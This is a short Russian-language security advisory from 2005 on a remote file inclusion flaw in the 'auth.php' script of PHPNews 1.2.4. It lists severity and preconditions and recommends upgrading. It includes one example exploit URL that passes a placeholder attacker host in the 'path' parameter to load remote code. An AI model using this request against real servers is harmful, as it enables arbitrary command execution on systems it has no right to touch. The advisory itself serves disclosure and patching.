Security Lab

PHP-инклюдинг в PHPNews

Дата публикации:11.03.2005
Всего просмотров:1182
Опасность:
Высокая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: PHPNews 1.x
Уязвимые версии: PHPNews 1.2.4

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на уязвимой системе.

Уязвимость существует в сценарии 'auth.php' из-за некорректной обработки входных данных в некоторых переменных. Злоумышленник может с помощью специально сформированного URL выполнить произвольные команды на уязвимой системе с привилегиями web сервера. Пример:

http://[target]/[dir]/auth.php?path=http://[attacker]/

Примечание: Для удачной эксплуатации уязвимости register_globals и allow_url_fopen должны быть включены в конфигурационном файле php.ini.

URL производителя: http://newsphp.sourceforge.net

Решение: Установите последнюю версию от производителя.
http://newsphp.sourceforge.net/downloads.php

Ссылки: PHPNews 'auth.php' Include File Flaw Lets Remote Users Execute Arbitrary Code